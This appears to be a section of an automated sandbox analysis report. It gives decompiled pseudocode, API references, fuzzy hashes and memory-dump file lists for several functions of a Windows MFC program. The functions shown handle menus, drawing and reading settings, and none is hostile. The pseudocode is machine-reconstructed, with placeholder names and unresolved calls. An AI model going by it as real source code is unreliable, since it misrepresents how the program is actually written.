API ID: #5787DrawRect$#1716#2754#470#6172#755ClientH_prologIconInflateText
String ID:
API String ID: 3846036329-0
Opcode ID: 21566ca87c659960aa63f89e73d40d168b50397e1f78659c18af1798479a24b5
Instruction ID: f16cd58052a41e163276f9b59121806d235cda51c7ed43984d4f92e3da616124
Opcode Fuzzy Hash: 21566ca87c659960aa63f89e73d40d168b50397e1f78659c18af1798479a24b5
Instruction Fuzzy Hash: 5F217C71A0061AAFCB10EBB4DC85FEEB779FF44304F50452EB166A3191DB38690ACB14

Uniqueness

Uniqueness Score: -1.00%

Function 004014CE, Relevance: 18.1, APIs: 12, Instructions: 77
windowCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004014CE() {
				signed int _t32;
				void* _t35;
				signed short _t38;
				int _t55;
				intOrPtr _t57;
				void* _t61;

				L004269E6();
				_t57 =  *((intOrPtr*)(_t61 + 0x10));
				_t38 = 0;
				if(_t57 == 0 || ( *(_t61 + 0xc) & 0x00000010) == 0) {
					L10:
					_t32 = 0;
				} else {
					_push(2);
					_push(0x26);
					L0042670E();
					_push( *((intOrPtr*)(_t61 + 8)));
					 *(_t61 - 4) = 0;
					_push(1);
					L00426708();
					L00426702();
					L00425E08();
					 *(_t61 - 4) = 1;
					_t55 = GetMenuItemCount( *(_t57 + 4));
					if(_t55 !=  *((intOrPtr*)(_t57 + 0x10))) {
						L0040187F(_t57);
					}
					if(_t55 <= 0) {
						L9:
						 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
						L00425DFC();
						 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
						L00425DFC();
						goto L10;
					} else {
						do {
							_push(0x400);
							_push(_t61 + 0x10);
							_push(_t38);
							_t35 = L00402207(_t57);
							if(_t35 == 0) {
								goto L8;
							} else {
								L00426702();
								_push( *(_t61 + 0xc));
								L004266FC();
								if(_t35 >= 0) {
									 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
									L00425DFC();
									 *(_t61 - 4) =  *(_t61 - 4) | 0xffffffff;
									L00425DFC();
									_t32 = _t38 & 0x0000ffff | 0x00020000;
								} else {
									goto L8;
								}
							}
							goto L11;
							L8:
							_t38 = _t38 + 1;
						} while (_t38 < _t55);
						goto L9;
					}
				}
				L11:
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t32;
			}

APIs

_EH_prolog.MSVCRT ref: 00416845
#536.MFC42(00000026,00000002), ref: 0041686B
#5856.MFC42(00000001,?,00000026,00000002), ref: 0041687B
#4202.MFC42(00000001,?,00000026,00000002), ref: 00416883
#540.MFC42(00000001,?,00000026,00000002), ref: 0041688B
GetMenuItemCount.USER32 ref: 00416897
#4202.MFC42(00000000,?,00000400), ref: 004168C7
#2764.MFC42(?,00000000,?,00000400), ref: 004168D2
#800.MFC42(00000000,?,00000400), ref: 004168E7
#800.MFC42(00000000,?,00000400), ref: 004168F3
#800.MFC42(?,00000000,?,00000400), ref: 00416919
#800.MFC42(?,00000000,?,00000400), ref: 00416925

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#4202$#2764#536#540#5856CountH_prologItemMenu
String ID:
API String ID: 2215035676-0
Opcode ID: 5921559fd90b67eac0438e989084063195ec8b33339ca31a7400099292cc363f
Instruction ID: 9ca7fcf196097ac5cf24c618edb70adfbb01b4a6b3a0be0a73cf390793129c50
Opcode Fuzzy Hash: 5921559fd90b67eac0438e989084063195ec8b33339ca31a7400099292cc363f
Instruction Fuzzy Hash: 3A21F331210228ABDB00EF65D881BEE7760AF0031CF51856EF826A31D2DB78DE05C658

Uniqueness

Uniqueness Score: -1.00%

Function 00401456, Relevance: 18.1, APIs: 12, Instructions: 76
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401456(void* __ecx, void* __eflags) {
				int _t39;
				int _t40;
				struct HMENU__* _t43;
				struct HMENU__* _t46;
				int _t50;
				void* _t67;
				void* _t69;

				L004269E6();
				_t67 = __ecx;
				L00425E08();
				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
				 *((intOrPtr*)(_t69 - 0x18)) =  *((intOrPtr*)(__ecx + 0x10));
				_t39 = L0040222A(__ecx);
				 *(_t69 - 0x10) =  *(_t69 - 0x10) & 0x00000000;
				_t50 = _t39;
				_t40 = GetMenuItemCount( *(__ecx + 4));
				if(_t50 < _t40) {
					do {
						_t41 =  *(_t69 - 0x10);
						if( *(_t69 - 0x10) <  *((intOrPtr*)(_t69 - 0x18))) {
							_push(_t69 - 0x1c);
							_push(L0040154B( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0xc)) + _t41 * 4))));
							 *(_t69 - 4) = 1;
							L00426054();
							 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
							L00425DFC();
							_t43 = GetSubMenu( *(_t67 + 4), _t50);
							_push(_t43);
							L0042635A();
							if(_t43 != 0) {
								 *( *((intOrPtr*)( *((intOrPtr*)(_t67 + 0xc)) +  *(_t69 - 0x10) * 4)) + 0x10) = 0x410;
								_t46 = GetSubMenu( *(_t67 + 4), _t50);
								_push(_t46);
								L0042635A();
								ModifyMenuA( *(_t67 + 4), _t50, 0x410,  *(_t46 + 4),  *(_t69 - 0x14));
							}
						}
						_t50 = _t50 + 1;
						 *(_t69 - 0x10) =  *(_t69 - 0x10) + 1;
						_t40 = GetMenuItemCount( *(_t67 + 4));
					} while (_t50 < _t40);
				}
				 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t40;
			}

APIs

_EH_prolog.MSVCRT ref: 00415D68
#540.MFC42 ref: 00415D77
GetMenuItemCount.USER32 ref: 00415D96
#858.MFC42(00000000,?), ref: 00415DCA
#800.MFC42(00000000,?), ref: 00415DD6
GetSubMenu.USER32 ref: 00415DDF
#2863.MFC42(00000000), ref: 00415DE2
GetSubMenu.USER32 ref: 00415DFF
#2863.MFC42(00000000), ref: 00415E02
ModifyMenuA.USER32(00000000,00000000,00000410,?,?), ref: 00415E17
GetMenuItemCount.USER32 ref: 00415E24
#800.MFC42 ref: 00415E3A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2863#800CountItem$#540#858H_prologModify
String ID:
API String ID: 3175700527-0
Opcode ID: 51dba4f9aa4f8a3916298c876b94a85560a2e29a845da247e36ee24ddadc8248
Instruction ID: ee6c11dd13f2d6845b64a5aab09801724672a3b31a38ccd9e9234cbd8c998d6b
Opcode Fuzzy Hash: 51dba4f9aa4f8a3916298c876b94a85560a2e29a845da247e36ee24ddadc8248
Instruction Fuzzy Hash: 5F21A271A00615DFCB10EBA5D985AEFB7B5FF44308F50485EE022A3191CB799E04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004020C2, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004020C2(intOrPtr __ecx) {
				intOrPtr _t37;
				struct HDC__* _t41;
				struct HBITMAP__* _t45;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t53;
				struct tagRECT* _t61;
				intOrPtr _t64;
				void* _t66;

				L004269E6();
				_t64 = __ecx;
				 *((intOrPtr*)(_t66 - 0x10)) = __ecx;
				L004264B0();
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *(__ecx + 0x14) =  *(__ecx + 0x14) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x42e34c;
				_t61 = __ecx + 0x20;
				 *(_t66 - 4) = 1;
				 *((intOrPtr*)(__ecx)) = 0x42e614;
				CopyRect(_t61,  *(_t66 + 0xc));
				_t48 =  *((intOrPtr*)(_t66 + 8));
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t64 + 0x1c)) = _t48;
				_t37 =  *((intOrPtr*)(_t48 + 0xc));
				_t53 = 0 | _t37 == 0x00000000;
				 *(_t64 + 0x30) = _t53;
				if(_t53 == 0) {
					 *((intOrPtr*)(_t64 + 0xc)) = _t37;
					 *(_t64 + 4) =  *(_t48 + 4);
					 *((intOrPtr*)(_t64 + 8)) =  *((intOrPtr*)(_t48 + 8));
				} else {
					if(_t48 != 0) {
						_t41 =  *(_t48 + 4);
					} else {
						_t41 = 0;
					}
					_push(CreateCompatibleDC(_t41));
					L004264AA();
					_t45 = CreateCompatibleBitmap( *(_t48 + 4), _t61->right - _t61->left, _t61->bottom - _t61->top);
					_t50 = _t64 + 0x10;
					_push(_t45);
					L004264BC();
					if(_t50 != 0) {
						_t24 = _t50 + 4; // 0x401992
						_t50 =  *_t24;
					}
					_push(_t50);
					_push( *(_t64 + 4));
					L00426540();
					_push( *((intOrPtr*)(_t64 + 0x24)));
					 *(_t64 + 0x18) = _t45;
					_push(_t61->left);
					_push(_t66 - 0x18);
					L004266B4();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t64;
			}

APIs

_EH_prolog.MSVCRT ref: 0041AF33
#323.MFC42 ref: 0041AF43
CopyRect.USER32 ref: 0041AF68
CreateCompatibleDC.GDI32(00000001), ref: 0041AF95
#1640.MFC42(00000000), ref: 0041AF9E
CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 0041AFB3
#1641.MFC42(00000000), ref: 0041AFBF
#5785.MFC42(00000001,0042E34C,00000000), ref: 0041AFCF
#6194.MFC42(00000000,?,00000001,00000001,0042E34C,00000000), ref: 0041AFE2

Strings

LB, xrefs: 0041AF50

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreate$#1640#1641#323#5785#6194BitmapCopyH_prologRect
String ID: LB
API String ID: 30330010-3532020319
Opcode ID: f4e087348d6d8be0f7fdc486648cd526d29c09423431e4c2ecf8e353a3383d51
Instruction ID: 3cf61096bef0b62cb1235e7a0b80d8c748f2b5a7472e632180eb0b1551341b30
Opcode Fuzzy Hash: f4e087348d6d8be0f7fdc486648cd526d29c09423431e4c2ecf8e353a3383d51
Instruction Fuzzy Hash: 773180B5600711DFCB10DF65D984A6ABBF8FF14304B00852EE84687601D738E955CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C23A, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040C23A(intOrPtr __ecx, void* __eflags) {
				void* _t38;
				intOrPtr _t39;
				void* _t58;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t58 - 0x10)) = __ecx;
				L00401F41(__ecx);
				 *((intOrPtr*)(_t58 - 4)) = 0;
				L00401A37(__ecx + 0x178);
				 *((char*)(_t58 - 4)) = 1;
				L004020E5(__ecx + 0x1c0);
				 *((char*)(_t58 - 4)) = 2;
				E00402216(__ecx + 0x218);
				 *((char*)(_t58 - 4)) = 3;
				L004262F4();
				 *((char*)(_t58 - 4)) = 4;
				L004262EE();
				 *((char*)(_t58 - 4)) = 5;
				E00401A0A(__ecx + 0x4b4);
				 *((char*)(_t58 - 4)) = 6;
				_t38 = E00401F4B(__ecx + 0x6c4);
				 *((char*)(_t58 - 4)) = 7;
				 *((intOrPtr*)(__ecx)) = 0x42d40c;
				L00425E44();
				_t39 =  *((intOrPtr*)(_t38 + 4));
				_push(1);
				_push("Language");
				_push("Settings");
				 *((intOrPtr*)(__ecx + 0x1bc)) = _t39;
				 *((intOrPtr*)(__ecx + 0x36c)) = 0;
				 *((intOrPtr*)(__ecx + 0x370)) = 0;
				 *((intOrPtr*)(__ecx + 0x374)) = 0;
				 *((intOrPtr*)(__ecx + 0x380)) = 0;
				 *((intOrPtr*)(__ecx + 0x378)) = 0;
				 *((intOrPtr*)(__ecx + 0x214)) = 0;
				 *((intOrPtr*)(__ecx + 0x37c)) = 0;
				L00425E3E();
				_push(0);
				_push("OnTop");
				_push("Settings");
				 *((intOrPtr*)(__ecx + 0x384)) = _t39;
				 *((intOrPtr*)(__ecx + 0x388)) = 0;
				L00425E3E();
				 *((intOrPtr*)(__ecx + 0x38c)) = _t39;
				 *((intOrPtr*)(__ecx + 0x390)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return __ecx;
			}

APIs

_EH_prolog.MSVCRT ref: 0040C23F

Part of subcall function 00402216: _EH_prolog.MSVCRT ref: 0040A801
Part of subcall function 00402216: #384.MFC42 ref: 0040A81D
Part of subcall function 00402216: #567.MFC42 ref: 0040A82E

#529.MFC42 ref: 0040C289
#554.MFC42 ref: 0040C298

Part of subcall function 00401A0A: _EH_prolog.MSVCRT ref: 0040B92B
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B94A
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B961
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B979
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B990
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B9A3
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B9BA
Part of subcall function 00401A0A: #1168.MFC42 ref: 0040B9CF

Part of subcall function 00401F4B: _EH_prolog.MSVCRT ref: 0041DC70
Part of subcall function 00401F4B: #298.MFC42 ref: 0041DC7E
Part of subcall function 00401F4B: #540.MFC42 ref: 0041DCA3
Part of subcall function 00401F4B: #860.MFC42(default), ref: 0041DCD1
Part of subcall function 00401F4B: GetSysColor.USER32(0000000C), ref: 0041DCE1
Part of subcall function 00401F4B: GetSysColor.USER32(00000016), ref: 0041DCEB

#1168.MFC42 ref: 0040C2C5
#3521.MFC42(Settings,Language,00000001), ref: 0040C30B
#3521.MFC42(Settings,OnTop,00000000,Settings,Language,00000001), ref: 0040C32D

Strings

Settings, xrefs: 0040C31C
Language, xrefs: 0040C2CF
OnTop, xrefs: 0040C317
Settings, xrefs: 0040C2D4

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$H_prolog$#1168#3521Color$#298#384#529#540#554#860
String ID: Language$OnTop$Settings$Settings
API String ID: 201245156-25859776
Opcode ID: 6ec77e193e10b3f58620c3e584a0a5716ddc929d0b63b92a5371ce5a600e1d27
Instruction ID: 062116a91f6c99932e3f078820ed8cd509018e3ea3a4d66074e2109542992b49
Opcode Fuzzy Hash: 6ec77e193e10b3f58620c3e584a0a5716ddc929d0b63b92a5371ce5a600e1d27
Instruction Fuzzy Hash: E1314DB0A01B40DFD325EF76C1457DAFBE8AF64304F40449FE1AA93292CBB82604DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401672, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00401672(void* __ecx) {
				signed short _t16;
				int _t21;
				signed short* _t33;
				void* _t35;
				void* _t37;

				L004269E6();
				L00425E44();
				L00425E08();
				_t33 =  *(_t35 + 0xc);
				_t21 = 0;
				_push(0);
				_push("Column Count");
				_t16 =  *_t33;
				_push(_t16);
				 *(_t35 - 4) = 0;
				L00425E3E();
				 *(_t35 + 0xc) = _t16;
				if(_t16 > 0) {
					do {
						_push(_t21);
						_push("Column %i");
						_push(_t35 - 0x10);
						L00425FDC();
						_t16 =  *_t33;
						_t37 = _t37 + 0xc;
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t35 - 0x10)));
						_push(_t16);
						L00425E3E();
						if(_t16 != 0xffffffff) {
							_t16 = SendMessageA( *( *((intOrPtr*)(_t35 + 8)) + 0x20), 0x101e, _t21, _t16 & 0x0000ffff);
						}
						_t21 = _t21 + 1;
					} while (_t21 <  *(_t35 + 0xc));
				}
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t16;
			}

APIs

_EH_prolog.MSVCRT ref: 0041E458
#1168.MFC42 ref: 0041E461
#540.MFC42 ref: 0041E46C
#3521.MFC42(00000000,Column Count,00000000), ref: 0041E484
#2818.MFC42(?,Column %i,00000000,00000000,Column Count,00000000), ref: 0041E49A
#3521.MFC42(00000000,000000FF,000000FF), ref: 0041E4AC
SendMessageA.USER32 ref: 0041E4C6
#800.MFC42(00000000,Column Count,00000000), ref: 0041E4D9

Strings

Column Count, xrefs: 0041E477
Column %i, xrefs: 0041E494

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3521$#1168#2818#540#800H_prologMessageSend
String ID: Column %i$Column Count
API String ID: 3350746845-4111091038
Opcode ID: a4f46036147f52fa1c40dc9b974afcccd17727aee6639932766a6c168609553f
Instruction ID: 63bc89fb95b8e2f288398504a2ec989c5a53f56f72815502ff2e0863bac6b411
Opcode Fuzzy Hash: a4f46036147f52fa1c40dc9b974afcccd17727aee6639932766a6c168609553f
Instruction Fuzzy Hash: 09117375700125BFCB14EF56DC86DBE7768FF44368B604A2AF569A7191C6389D00C718

Uniqueness

Uniqueness Score: -1.00%

Function 00422461, Relevance: 16.7, APIs: 11, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00422461(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t97;
				struct HBRUSH__* _t101;
				struct tagRECT _t114;
				struct HBRUSH__* _t117;
				struct HICON__* _t122;
				signed int _t123;
				void* _t124;
				signed int _t138;
				intOrPtr _t140;
				struct tagRECT _t141;
				intOrPtr _t142;
				intOrPtr _t154;
				intOrPtr _t156;
				struct tagSIZE* _t161;
				struct tagSIZE _t163;
				void* _t164;
				intOrPtr _t171;
				intOrPtr _t172;
				void* _t175;

				L004269E6();
				_t140 =  *((intOrPtr*)(_t175 + 0x14));
				 *((intOrPtr*)(_t175 - 0x10)) = __ecx;
				_push(_t175 - 0x14);
				L004014F6(_t140);
				_t161 = _t175 - 0x24;
				 *(_t175 - 4) =  *(_t175 - 4) & 0x00000000;
				GetTextExtentPoint32A( *( *((intOrPtr*)(_t175 + 8)) + 8),  *(_t175 - 0x14),  *( *(_t175 - 0x14) - 8), _t161);
				_t163 =  *(_t175 - 0x24);
				 *(_t175 - 0x1c) = _t163;
				_t164 = _t163 + 4;
				if(_t164 > 0xc8) {
					_t164 = 0xc8;
				}
				 *(_t175 + 0x10) =  *(_t175 + 0x10) & 0x00000000;
				_t171 =  *((intOrPtr*)( *(_t175 + 0x10) + 0xc)) -  *((intOrPtr*)( *(_t175 + 0x10) + 4)) - 0x1a;
				if( *((intOrPtr*)(_t140 + 0x20)) != 0) {
					_t138 = 0x12;
					 *(_t175 + 0x10) = _t138;
					_t164 = _t164 + _t138;
				}
				_t141 =  *(_t175 + 0xc);
				_t97 = _t164 + 6;
				 *((intOrPtr*)(_t175 - 0x18)) = _t97;
				 *((intOrPtr*)(_t175 - 0x2c)) = _t97 + _t141;
				_t24 = _t171 + 0x15; // -5
				 *((intOrPtr*)(_t175 - 0x28)) = _t24;
				_t101 =  *((intOrPtr*)(_t175 - 0x10)) + 0x40;
				 *(_t175 - 0x34) = _t141;
				 *((intOrPtr*)(_t175 - 0x30)) = _t171;
				if(_t101 != 0) {
					_t101 =  *(_t101 + 4);
				}
				FrameRect( *( *((intOrPtr*)(_t175 + 8)) + 4), _t175 - 0x34, _t101);
				_push( *((intOrPtr*)(_t175 - 0x10)) + 0x70);
				L00426636();
				_t35 = _t171 + 0x13; // -7
				_push(_t141 + 1);
				_push(_t175 - 0x2c);
				L004266F0();
				_t39 = _t171 + 0x13; // -7
				_push(_t164 + _t141 + 4);
				L004266EA();
				_push(_t171);
				_push(_t164 + _t141 + 4);
				_push(_t175 - 0x2c);
				L004266F0();
				_t48 = _t171 + 0x13; // -7
				_push(_t164 + _t141 + 4);
				L004266EA();
				_t114 = _t141 + 1;
				_t52 = _t171 + 1; // -25
				_t154 = _t52;
				 *(_t175 - 0x34) = _t114;
				 *((intOrPtr*)(_t175 - 0x30)) = _t154;
				 *((intOrPtr*)(_t175 - 0x2c)) = _t164 + _t114 + 2;
				_t117 =  *((intOrPtr*)(_t175 - 0x10)) + 0x48;
				 *((intOrPtr*)(_t175 - 0x28)) = _t154 + 0x11;
				if(_t117 != 0) {
					_t117 =  *(_t117 + 4);
				}
				FillRect( *( *((intOrPtr*)(_t175 + 8)) + 4), _t175 - 0x34, _t117);
				_t122 =  *( *((intOrPtr*)(_t175 + 0x14)) + 0x20);
				if(_t122 != 0) {
					_t66 = _t171 + 2; // -24
					DrawIconEx( *( *((intOrPtr*)(_t175 + 8)) + 4), _t141 + 4, _t66, _t122, 0x10, 0x10, 0, 0, 3);
				}
				_t123 =  *(_t175 + 0x10);
				_t156 =  *((intOrPtr*)(_t175 - 0x20));
				_t73 = _t141 + 3; // 0x3
				_t142 = _t123 + _t73;
				_t124 = 0x14;
				asm("cdq");
				 *((intOrPtr*)(_t175 - 0x44)) = _t142;
				 *((intOrPtr*)(_t175 - 0x3c)) = _t164 - _t123 + _t142;
				_t77 = _t171 + 1; // 0x15
				_t172 = (_t124 - _t156 - _t161 >> 1) + _t77;
				 *((intOrPtr*)(_t175 - 0x40)) = _t172;
				 *((intOrPtr*)(_t175 - 0x38)) = _t172 + _t156;
				L00401BC7( *((intOrPtr*)(_t175 + 0x14)),  *((intOrPtr*)(_t175 - 0x10)) + 0x80);
				E004011B8( *((intOrPtr*)(_t175 + 0x14)), _t175 - 0x44);
				 *(_t175 - 4) =  *(_t175 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t175 - 0xc));
				return  *((intOrPtr*)(_t175 - 0x18));
			}

APIs

_EH_prolog.MSVCRT ref: 00422466
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00422498
FrameRect.USER32 ref: 00422502
#5787.MFC42(-00000070), ref: 00422512
#4297.MFC42(?,?,-00000007,-00000070), ref: 00422526
#4133.MFC42(00000000,-00000007,?,?,-00000007,-00000070), ref: 00422537
#4297.MFC42(?,00000000,-0000001A,00000000,-00000007,?,?,-00000007,-00000070), ref: 00422549
#4133.MFC42(00000000,-00000007,?,00000000,-0000001A,00000000,-00000007,?,?,-00000007,-00000070), ref: 0042255A
FillRect.USER32 ref: 00422590
DrawIconEx.USER32 ref: 004225B9

Part of subcall function 004011B8: #4299.MFC42(?,?,?,?,00000001), ref: 00421529

#800.MFC42(-00000080), ref: 0042260D

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297Rect$#4299#5787#800DrawExtentFillFrameH_prologIconPoint32Text
String ID:
API String ID: 182759629-0
Opcode ID: f327a2a9aa4760b7f3610bc7f87492f059261560e1dee2382e353ef417d6957a
Instruction ID: 39acb9cdce0d1b7ed9ea6aab3785e0f38b905c55b151b1ea56fb812a60c5a23a
Opcode Fuzzy Hash: f327a2a9aa4760b7f3610bc7f87492f059261560e1dee2382e353ef417d6957a
Instruction Fuzzy Hash: 6D611C76A0021AAFCB10CF98D985EDEBBB9FF48304F05812AF905E7251D774EA04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015CD, Relevance: 16.6, APIs: 11, Instructions: 89
COMMON

